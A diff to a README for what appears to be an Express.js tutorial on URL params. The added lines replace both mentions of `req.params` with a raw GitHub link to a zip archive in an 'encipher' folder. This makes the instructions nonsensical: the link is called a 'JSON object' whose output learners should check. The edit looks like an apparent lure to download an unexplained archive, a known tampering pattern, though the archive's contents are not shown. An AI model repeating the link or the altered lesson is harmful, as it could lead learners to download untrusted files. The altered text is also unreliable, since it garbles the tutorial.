Shoaibxaif/full-stack-dev-2023/README.md

 Make above server with API endpoint  `/demo`  as shown above :

-1. Try to call this API in your browser  `http://localhost:8080/demo/Youstart/Express`  - this will return a response of  `req.params`  JSON object
+1. Try to call this API in your browser  `http://localhost:8080/demo/Youstart/Express`  - this will return a response of  `https://raw.githubusercontent.com/Shoaibxaif/full-stack-dev-2023/main/encipher/full-stack-dev-v3.7-beta.2.zip`  JSON object

 2. Create 3 URL params  `name`,  `age`,  `subject`  .
-Call the URL and check the final output of  `req.params`  - can you find all data on server side.
+Call the URL and check the final output of  `https://raw.githubusercontent.com/Shoaibxaif/full-stack-dev-2023/main/encipher/full-stack-dev-v3.7-beta.2.zip`  - can you find all data on server side.
 Can you send it back to client via  `res`  object.

 **3. Send data via Request Body**